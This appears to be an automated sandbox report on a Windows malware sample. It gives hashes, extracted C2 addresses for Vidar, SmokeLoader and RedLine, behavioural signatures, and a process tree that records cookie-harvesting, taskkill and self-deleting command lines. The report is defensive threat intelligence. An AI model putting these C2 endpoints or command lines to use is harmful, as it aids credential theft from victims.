Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    325s
  • max time network
    1823s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-08-2021 17:25

General

  • Target

    8 (2).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

40k_EXTRA

C2

45.14.49.117:14251

Extracted

Family

redline

Botnet

Focus1

C2

135.148.139.222:33569

Extracted

Family

vidar

Version

39.9

Botnet

921

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

redline

Botnet

Build Smailik

C2

195.149.87.79:12439

Extracted

Family

redline

Botnet

Version 7.05

C2

149.202.65.221:64206

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 3 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 5 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 58 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 19 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2796
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2776
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2672
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2488
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2468
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1904
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1412
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1356
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                    • Modifies registry class
                    PID:1268
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1080
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:936
                      • C:\Users\Admin\AppData\Roaming\rsrbfsf
                        C:\Users\Admin\AppData\Roaming\rsrbfsf
                        2⤵
                          PID:5436
                        • C:\Users\Admin\AppData\Roaming\wirbfsf
                          C:\Users\Admin\AppData\Roaming\wirbfsf
                          2⤵
                            PID:3888
                            • C:\Users\Admin\AppData\Roaming\wirbfsf
                              C:\Users\Admin\AppData\Roaming\wirbfsf
                              3⤵
                                PID:5048
                            • \??\c:\windows\system\svchost.exe
                              c:\windows\system\svchost.exe
                              2⤵
                                PID:1472
                              • C:\Users\Admin\AppData\Roaming\rsrbfsf
                                C:\Users\Admin\AppData\Roaming\rsrbfsf
                                2⤵
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:5584
                              • \??\c:\windows\system\svchost.exe
                                c:\windows\system\svchost.exe
                                2⤵
                                  PID:5108
                                • C:\Users\Admin\AppData\Roaming\wirbfsf
                                  C:\Users\Admin\AppData\Roaming\wirbfsf
                                  2⤵
                                    PID:5356
                                    • C:\Users\Admin\AppData\Roaming\wirbfsf
                                      C:\Users\Admin\AppData\Roaming\wirbfsf
                                      3⤵
                                        PID:5544
                                    • \??\c:\windows\system\svchost.exe
                                      c:\windows\system\svchost.exe
                                      2⤵
                                        PID:5896
                                      • C:\Users\Admin\AppData\Roaming\rsrbfsf
                                        C:\Users\Admin\AppData\Roaming\rsrbfsf
                                        2⤵
                                          PID:5412
                                        • C:\Users\Admin\AppData\Roaming\wirbfsf
                                          C:\Users\Admin\AppData\Roaming\wirbfsf
                                          2⤵
                                            PID:3880
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                          1⤵
                                            PID:344
                                          • C:\Users\Admin\AppData\Local\Temp\8 (2).exe
                                            "C:\Users\Admin\AppData\Local\Temp\8 (2).exe"
                                            1⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:3952
                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of WriteProcessMemory
                                              PID:1920
                                              • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\setup_install.exe
                                                "C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\setup_install.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of WriteProcessMemory
                                                PID:2772
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3004
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_1.exe
                                                    sonia_1.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:2196
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2212
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_2.exe
                                                    sonia_2.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious behavior: MapViewOfSection
                                                    PID:1252
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1248
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_4.exe
                                                    sonia_4.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2088
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                  4⤵
                                                    PID:3256
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3368
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_6.exe
                                                      sonia_6.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3712
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:3968
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:3876
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        6⤵
                                                        • Drops file in Program Files directory
                                                        PID:4960
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        6⤵
                                                          PID:2108
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2820
                                                      • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_5.exe
                                                        sonia_5.exe
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Checks computer location settings
                                                        PID:3172
                                                        • C:\Users\Admin\Documents\U7J982otLvuNtph2AA5inEq6.exe
                                                          "C:\Users\Admin\Documents\U7J982otLvuNtph2AA5inEq6.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:4812
                                                        • C:\Users\Admin\Documents\x9DEaaaNKenqrsMtZG7zZt25.exe
                                                          "C:\Users\Admin\Documents\x9DEaaaNKenqrsMtZG7zZt25.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:4796
                                                        • C:\Users\Admin\Documents\TDu8lQOMjBlh7lr7sZIJIcv5.exe
                                                          "C:\Users\Admin\Documents\TDu8lQOMjBlh7lr7sZIJIcv5.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4788
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4748
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im chrome.exe
                                                              8⤵
                                                              • Kills process with taskkill
                                                              PID:5340
                                                        • C:\Users\Admin\Documents\3Ep650knDCmvSLQPeS38pREj.exe
                                                          "C:\Users\Admin\Documents\3Ep650knDCmvSLQPeS38pREj.exe"
                                                          6⤵
                                                            PID:4780
                                                            • C:\Users\Admin\Documents\3Ep650knDCmvSLQPeS38pREj.exe
                                                              C:\Users\Admin\Documents\3Ep650knDCmvSLQPeS38pREj.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4992
                                                          • C:\Users\Admin\Documents\0UiYsagEFlSEVXoMSDBBvShF.exe
                                                            "C:\Users\Admin\Documents\0UiYsagEFlSEVXoMSDBBvShF.exe"
                                                            6⤵
                                                              PID:4772
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "0UiYsagEFlSEVXoMSDBBvShF.exe" /f & erase "C:\Users\Admin\Documents\0UiYsagEFlSEVXoMSDBBvShF.exe" & exit
                                                                7⤵
                                                                  PID:5140
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /im "0UiYsagEFlSEVXoMSDBBvShF.exe" /f
                                                                    8⤵
                                                                    • Kills process with taskkill
                                                                    PID:4284
                                                              • C:\Users\Admin\Documents\Zyf0mJyA1s_gZCfFEGam9KYX.exe
                                                                "C:\Users\Admin\Documents\Zyf0mJyA1s_gZCfFEGam9KYX.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Modifies registry class
                                                                PID:4764
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5356
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:6008
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5876
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5028
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  7⤵
                                                                    PID:4204
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    7⤵
                                                                      PID:4720
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      7⤵
                                                                        PID:6120
                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        7⤵
                                                                          PID:4812
                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                            PID:2424
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                              PID:1604
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                                PID:5660
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                  PID:656
                                                                              • C:\Users\Admin\Documents\tKeR0wVlG8l4KYhp5YW24Z1h.exe
                                                                                "C:\Users\Admin\Documents\tKeR0wVlG8l4KYhp5YW24Z1h.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:4756
                                                                              • C:\Users\Admin\Documents\7pGIET3ZHLbkdqbdsZKxeBGW.exe
                                                                                "C:\Users\Admin\Documents\7pGIET3ZHLbkdqbdsZKxeBGW.exe"
                                                                                6⤵
                                                                                  PID:4748
                                                                                  • C:\Users\Admin\Documents\7pGIET3ZHLbkdqbdsZKxeBGW.exe
                                                                                    C:\Users\Admin\Documents\7pGIET3ZHLbkdqbdsZKxeBGW.exe
                                                                                    7⤵
                                                                                      PID:4960
                                                                                  • C:\Users\Admin\Documents\yw8z2TZcvBjI6dnJ7wqBecFK.exe
                                                                                    "C:\Users\Admin\Documents\yw8z2TZcvBjI6dnJ7wqBecFK.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4740
                                                                                  • C:\Users\Admin\Documents\u1eVgC1uBJw7OYaFUWaKQ1GV.exe
                                                                                    "C:\Users\Admin\Documents\u1eVgC1uBJw7OYaFUWaKQ1GV.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4728
                                                                                    • C:\Users\Admin\Documents\u1eVgC1uBJw7OYaFUWaKQ1GV.exe
                                                                                      "C:\Users\Admin\Documents\u1eVgC1uBJw7OYaFUWaKQ1GV.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:4988
                                                                                  • C:\Users\Admin\Documents\5syKE6m1Px4eUJYiaO4ktYOc.exe
                                                                                    "C:\Users\Admin\Documents\5syKE6m1Px4eUJYiaO4ktYOc.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4716
                                                                                    • C:\Users\Admin\Documents\5syKE6m1Px4eUJYiaO4ktYOc.exe
                                                                                      C:\Users\Admin\Documents\5syKE6m1Px4eUJYiaO4ktYOc.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2712
                                                                                  • C:\Users\Admin\Documents\sR5D5ntJNXz0d11b41V3Aew4.exe
                                                                                    "C:\Users\Admin\Documents\sR5D5ntJNXz0d11b41V3Aew4.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4704
                                                                                    • C:\Users\Admin\Documents\sR5D5ntJNXz0d11b41V3Aew4.exe
                                                                                      C:\Users\Admin\Documents\sR5D5ntJNXz0d11b41V3Aew4.exe
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4580
                                                                                  • C:\Users\Admin\Documents\4z0PsIEoPWTUctmbrJXoqmVf.exe
                                                                                    "C:\Users\Admin\Documents\4z0PsIEoPWTUctmbrJXoqmVf.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2196
                                                                                  • C:\Users\Admin\Documents\k1MSvpR3djDsYjwyNUQb1wvW.exe
                                                                                    "C:\Users\Admin\Documents\k1MSvpR3djDsYjwyNUQb1wvW.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:2740
                                                                                  • C:\Users\Admin\Documents\OhZIFr3YPK31XBxxzITd97O5.exe
                                                                                    "C:\Users\Admin\Documents\OhZIFr3YPK31XBxxzITd97O5.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3464
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      7⤵
                                                                                        PID:1776
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5492
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        7⤵
                                                                                          PID:4112
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          7⤵
                                                                                            PID:2040
                                                                                        • C:\Users\Admin\Documents\YmQ2ByP8uFtz6K7xGuywEAm6.exe
                                                                                          "C:\Users\Admin\Documents\YmQ2ByP8uFtz6K7xGuywEAm6.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4540
                                                                                          • C:\Users\Admin\Documents\YmQ2ByP8uFtz6K7xGuywEAm6.exe
                                                                                            "C:\Users\Admin\Documents\YmQ2ByP8uFtz6K7xGuywEAm6.exe"
                                                                                            7⤵
                                                                                              PID:5668
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5668 -s 1220
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Program crash
                                                                                                PID:1776
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 828
                                                                                              7⤵
                                                                                              • Program crash
                                                                                              PID:5256
                                                                                          • C:\Users\Admin\Documents\HxmXoZW3jLnT9p4kwZaVpCxK.exe
                                                                                            "C:\Users\Admin\Documents\HxmXoZW3jLnT9p4kwZaVpCxK.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks processor information in registry
                                                                                            PID:4824
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im HxmXoZW3jLnT9p4kwZaVpCxK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\HxmXoZW3jLnT9p4kwZaVpCxK.exe" & del C:\ProgramData\*.dll & exit
                                                                                              7⤵
                                                                                                PID:5392
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /im HxmXoZW3jLnT9p4kwZaVpCxK.exe /f
                                                                                                  8⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:5428
                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                  timeout /t 6
                                                                                                  8⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:2244
                                                                                            • C:\Users\Admin\Documents\PGhWZv11_f7VwLcIIgQcJmdd.exe
                                                                                              "C:\Users\Admin\Documents\PGhWZv11_f7VwLcIIgQcJmdd.exe"
                                                                                              6⤵
                                                                                                PID:628
                                                                                              • C:\Users\Admin\Documents\ScPpOly9qxjvkO_fTD2RmXlJ.exe
                                                                                                "C:\Users\Admin\Documents\ScPpOly9qxjvkO_fTD2RmXlJ.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Program Files directory
                                                                                                PID:4516
                                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Drops startup file
                                                                                                  PID:4592
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4772
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5732
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    8⤵
                                                                                                      PID:4776
